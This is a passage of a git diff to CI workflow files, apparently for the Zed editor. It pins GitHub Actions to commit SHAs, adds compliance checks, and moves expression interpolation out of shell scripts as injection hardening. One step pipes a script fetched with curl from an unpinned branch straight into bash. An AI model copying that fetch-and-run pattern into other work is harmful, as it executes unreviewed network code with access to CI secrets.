namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust 
path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -78,7 +81,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache @@ -110,7 +113,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -150,7 +153,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -158,7 +161,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -177,9 +180,12 @@ jobs: clippy_linux: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -187,14 +193,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - 
uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -214,7 +218,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -242,7 +246,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_tests::check_scripts::run_shellcheck @@ -251,8 +255,14 @@ jobs: name: run_tests::check_scripts::download_actionlint run: bash <(curl https://raw.githubusercontent.com/rhysd/actionlint/main/scripts/download-actionlint.bash) - name: run_tests::check_scripts::run_actionlint - run: | - ${{ steps.get_actionlint.outputs.executable }} -color + run: '"$ACTIONLINT_BIN" -color' + env: + ACTIONLINT_BIN: ${{ steps.get_actionlint.outputs.executable }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: run_tests::check_scripts::check_xtask_workflows run: | cargo xtask workflows @@ -267,7 +277,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 25 @@ -283,6 +293,51 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} timeout-minutes: 60 + compliance_check: 
+ if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-16x32-ubuntu-2204 + env: + COMPLIANCE_FILE_PATH: compliance.md + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + ref: ${{ github.ref }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: run-compliance-check + name: release::compliance_check::run_compliance_check + run: cargo xtask compliance "$GITHUB_REF_NAME" --report-path "$COMPLIANCE_FILE_OUTPUT" + env: + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: release::compliance_check::send_compliance_slack_notification + if: always() + run: | + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + STATUS="✅ Compliance check passed for $GITHUB_REF_NAME" + else + STATUS="❌ Compliance check failed for $GITHUB_REF_NAME" + fi + + REPORT_CONTENT="" + if [ -f "$COMPLIANCE_FILE_OUTPUT" ]; then + REPORT_CONTENT=$(cat "$REPORT_FILE") + fi + + MESSAGE=$(printf "%s\n\n%s" "$STATUS" "$REPORT_CONTENT") + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + COMPLIANCE_OUTCOME: ${{ steps.run-compliance-check.outcome }} bundle_linux_aarch64: needs: - run_tests_linux @@ -293,9 +348,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: 
steps::setup_sentry @@ -304,8 +361,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -333,9 +388,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -344,8 +401,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -380,7 +435,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -425,7 +480,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -474,7 +529,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -519,7 +574,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: 
steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -603,22 +658,61 @@ jobs: echo "All expected assets are present in the release." env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + fetch-depth: 0 + ref: ${{ github.ref }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - id: run-post-upload-compliance-check + name: release::validate_release_assets::run_post_upload_compliance_check + run: cargo xtask compliance "$GITHUB_REF_NAME" --report-path target/compliance-report + env: + GITHUB_APP_ID: ${{ secrets.ZED_ZIPPY_APP_ID }} + GITHUB_APP_KEY: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + - name: release::validate_release_assets::send_post_upload_compliance_notification + if: always() + run: | + if [ -z "$COMPLIANCE_OUTCOME" ] || [ "$COMPLIANCE_OUTCOME" == "skipped" ]; then + echo "Compliance check was skipped, not sending notification" + exit 0 + fi + + TAG="$GITHUB_REF_NAME" + + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + MESSAGE="✅ Post-upload compliance re-check passed for $TAG" + else + MESSAGE="❌ Post-upload compliance re-check failed for $TAG" + fi + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + env: + SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + COMPLIANCE_OUTCOME: ${{ steps.run-post-upload-compliance-check.outcome }} auto_release_preview: needs: - validate_release_assets if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, '.0-pre') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - - id: get-app-token + - id: 
generate-token name: steps::authenticate_as_zippy - uses: actions/create-github-app-token@bef1eaf1c0ac2b148ee2a0a74c65fbe6db0631f1 + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - name: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false run: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false env: - GITHUB_TOKEN: ${{ steps.get-app-token.outputs.token }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} push_release_update_notification: needs: - create_draft_release @@ -644,12 +738,7 @@ jobs: - id: generate-webhook-message name: release::generate_slack_message run: | - MESSAGE=$(DRAFT_RESULT="${{ needs.create_draft_release.result }}" - UPLOAD_RESULT="${{ needs.upload_release_assets.result }}" - VALIDATE_RESULT="${{ needs.validate_release_assets.result }}" - AUTO_RELEASE_RESULT="${{ needs.auto_release_preview.result }}" - TAG="$GITHUB_REF_NAME" - RUN_URL="${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}" + MESSAGE=$(TAG="$GITHUB_REF_NAME" if [ "$DRAFT_RESULT" == "failure" ]; then echo "❌ Draft release creation failed for $TAG: $RUN_URL" @@ -659,19 +748,19 @@ jobs: echo "❌ Release asset upload failed for $TAG: $RELEASE_URL" elif [ "$UPLOAD_RESULT" == "cancelled" ] || [ "$UPLOAD_RESULT" == "skipped" ]; then FAILED_JOBS="" - if [ "${{ needs.run_tests_mac.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_mac"; fi - if [ "${{ needs.run_tests_linux.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_linux"; fi - if [ "${{ needs.run_tests_windows.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_windows"; fi - if [ "${{ needs.clippy_mac.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_mac"; fi - if [ "${{ needs.clippy_linux.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS 
clippy_linux"; fi - if [ "${{ needs.clippy_windows.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_windows"; fi - if [ "${{ needs.check_scripts.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS check_scripts"; fi - if [ "${{ needs.bundle_linux_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_aarch64"; fi - if [ "${{ needs.bundle_linux_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_x86_64"; fi - if [ "${{ needs.bundle_mac_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_aarch64"; fi - if [ "${{ needs.bundle_mac_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_x86_64"; fi - if [ "${{ needs.bundle_windows_aarch64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_aarch64"; fi - if [ "${{ needs.bundle_windows_x86_64.result }}" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_x86_64"; fi + if [ "$RESULT_RUN_TESTS_MAC" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_mac"; fi + if [ "$RESULT_RUN_TESTS_LINUX" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_linux"; fi + if [ "$RESULT_RUN_TESTS_WINDOWS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS run_tests_windows"; fi + if [ "$RESULT_CLIPPY_MAC" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_mac"; fi + if [ "$RESULT_CLIPPY_LINUX" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_linux"; fi + if [ "$RESULT_CLIPPY_WINDOWS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS clippy_windows"; fi + if [ "$RESULT_CHECK_SCRIPTS" == "failure" ];then FAILED_JOBS="$FAILED_JOBS check_scripts"; fi + if [ "$RESULT_BUNDLE_LINUX_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_aarch64"; fi + if [ "$RESULT_BUNDLE_LINUX_X86_64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_linux_x86_64"; fi + if [ "$RESULT_BUNDLE_MAC_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_aarch64"; fi + if [ "$RESULT_BUNDLE_MAC_X86_64" 
== "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_mac_x86_64"; fi + if [ "$RESULT_BUNDLE_WINDOWS_AARCH64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_aarch64"; fi + if [ "$RESULT_BUNDLE_WINDOWS_X86_64" == "failure" ];then FAILED_JOBS="$FAILED_JOBS bundle_windows_x86_64"; fi FAILED_JOBS=$(echo "$FAILED_JOBS" | xargs) if [ "$UPLOAD_RESULT" == "cancelled" ]; then if [ -n "$FAILED_JOBS" ]; then @@ -700,12 +789,29 @@ jobs: echo "message=$MESSAGE" >> "$GITHUB_OUTPUT" env: GH_TOKEN: ${{ github.token }} + DRAFT_RESULT: ${{ needs.create_draft_release.result }} + UPLOAD_RESULT: ${{ needs.upload_release_assets.result }} + VALIDATE_RESULT: ${{ needs.validate_release_assets.result }} + AUTO_RELEASE_RESULT: ${{ needs.auto_release_preview.result }} + RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }} + RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} + RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} + RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} + RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} + RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} + RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }} + RESULT_BUNDLE_LINUX_AARCH64: ${{ needs.bundle_linux_aarch64.result }} + RESULT_BUNDLE_LINUX_X86_64: ${{ needs.bundle_linux_x86_64.result }} + RESULT_BUNDLE_MAC_AARCH64: ${{ needs.bundle_mac_aarch64.result }} + RESULT_BUNDLE_MAC_X86_64: ${{ needs.bundle_mac_x86_64.result }} + RESULT_BUNDLE_WINDOWS_AARCH64: ${{ needs.bundle_windows_aarch64.result }} + RESULT_BUNDLE_WINDOWS_X86_64: ${{ needs.bundle_windows_x86_64.result }} - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"${{ steps.generate-webhook-message.outputs.message }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" 
''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: ${{ steps.generate-webhook-message.outputs.message }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/release_nightly.yml b/.github/workflows/release_nightly.yml index d3f01447e52f418713499b84ad454085fd3cb646..30d0e1fbf9c7955d1216e2e3d7ac51a9a51f4416 100644 --- a/.github/workflows/release_nightly.yml +++ b/.github/workflows/release_nightly.yml @@ -16,7 +16,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -30,7 +30,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -70,7 +70,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -103,9 +103,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -120,8 +122,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - 
name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -149,9 +149,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -166,8 +168,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -202,7 +202,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -253,7 +253,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -308,7 +308,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -361,7 +361,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: 
actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_bundling::set_release_channel_to_nightly @@ -406,11 +406,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: nix - name: nix_build::build_nix::install_nix @@ -440,11 +440,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_store_macos - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: path: ~/nix-cache - name: nix_build::build_nix::install_nix @@ -488,7 +488,7 @@ jobs: runs-on: namespace-profile-4x8-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -550,11 +550,10 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: release::send_slack_message - run: | - curl -X POST -H 'Content-type: application/json'\ - --data '{"text":"❌ ${{ github.workflow }} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}"}' "$SLACK_WEBHOOK" + run: 'curl -X POST -H ''Content-type: application/json'' --data "$(jq -n --arg text "$SLACK_MESSAGE" ''{"text": $text}'')" "$SLACK_WEBHOOK"' env: SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK_WORKFLOW_FAILURES }} + SLACK_MESSAGE: '❌ ${{ github.workflow 
}} failed: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}' defaults: run: shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_agent_evals.yml b/.github/workflows/run_agent_evals.yml deleted file mode 100644 index c506039ce7c1863bd3c60091beb78d5239110bbd..0000000000000000000000000000000000000000 --- a/.github/workflows/run_agent_evals.yml +++ /dev/null @@ -1,73 +0,0 @@ -# Generated from xtask::workflows::run_agent_evals -# Rebuild with `cargo xtask workflows`. -name: run_agent_evals -env: - CARGO_TERM_COLOR: always - CARGO_INCREMENTAL: '0' - RUST_BACKTRACE: '1' - ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }} - OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }} - GOOGLE_AI_API_KEY: ${{ secrets.GOOGLE_AI_API_KEY }} - GOOGLE_CLOUD_PROJECT: ${{ secrets.GOOGLE_CLOUD_PROJECT }} - ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} - ZED_EVAL_TELEMETRY: '1' - MODEL_NAME: ${{ inputs.model_name }} -on: - workflow_dispatch: - inputs: - model_name: - description: model_name - required: true - type: string -jobs: - agent_evals: - runs-on: namespace-profile-16x32-ubuntu-2204 - steps: - - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 - with: - cache: rust - path: ~/.rustup - - name: steps::setup_linux - run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - - name: steps::download_wasi_sdk - run: ./script/download-wasi-sdk - - name: steps::setup_cargo_config - run: | - mkdir -p ./../.cargo - cp ./.cargo/ci-config.toml ./../.cargo/config.toml - - name: steps::setup_sccache - run: ./script/setup-sccache - env: - R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} - R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} - R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} - SCCACHE_BUCKET: sccache-zed - - name: cargo build 
--package=eval - run: cargo build --package=eval - - name: run_agent_evals::agent_evals::run_eval - run: cargo run --package=eval -- --repetitions=8 --concurrency=1 --model "${MODEL_NAME}" - env: - ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }} - OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }} - GOOGLE_AI_API_KEY: ${{ secrets.GOOGLE_AI_API_KEY }} - GOOGLE_CLOUD_PROJECT: ${{ secrets.GOOGLE_CLOUD_PROJECT }} - - name: steps::show_sccache_stats - run: sccache --show-stats || true - - name: steps::cleanup_cargo_config - if: always() - run: | - rm -rf ./../.cargo - timeout-minutes: 600 -concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} - cancel-in-progress: true -defaults: - run: - shell: bash -euxo pipefail {0} diff --git a/.github/workflows/run_bundling.yml b/.github/workflows/run_bundling.yml index 2b536425a1dc4b9663c726fd9259c95e0626efda..71b2e4d5fa0b386334bb8acab8e732f1c7d0ad93 100644 --- a/.github/workflows/run_bundling.yml +++ b/.github/workflows/run_bundling.yml @@ -19,9 +19,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -30,8 +32,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -58,9 +58,11 @@ jobs: CARGO_INCREMENTAL: 0 ZED_CLIENT_CHECKSUM_SEED: ${{ secrets.ZED_CLIENT_CHECKSUM_SEED }} ZED_MINIDUMP_ENDPOINT: ${{ secrets.ZED_SENTRY_MINIDUMP_ENDPOINT }} + CC: clang-18 + CXX: clang++-18 steps: - name: steps::checkout_repo 
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -69,8 +71,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -104,7 +104,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -148,7 +148,7 @@ jobs: APPLE_NOTARIZATION_ISSUER_ID: ${{ secrets.APPLE_NOTARIZATION_ISSUER_ID }} steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: 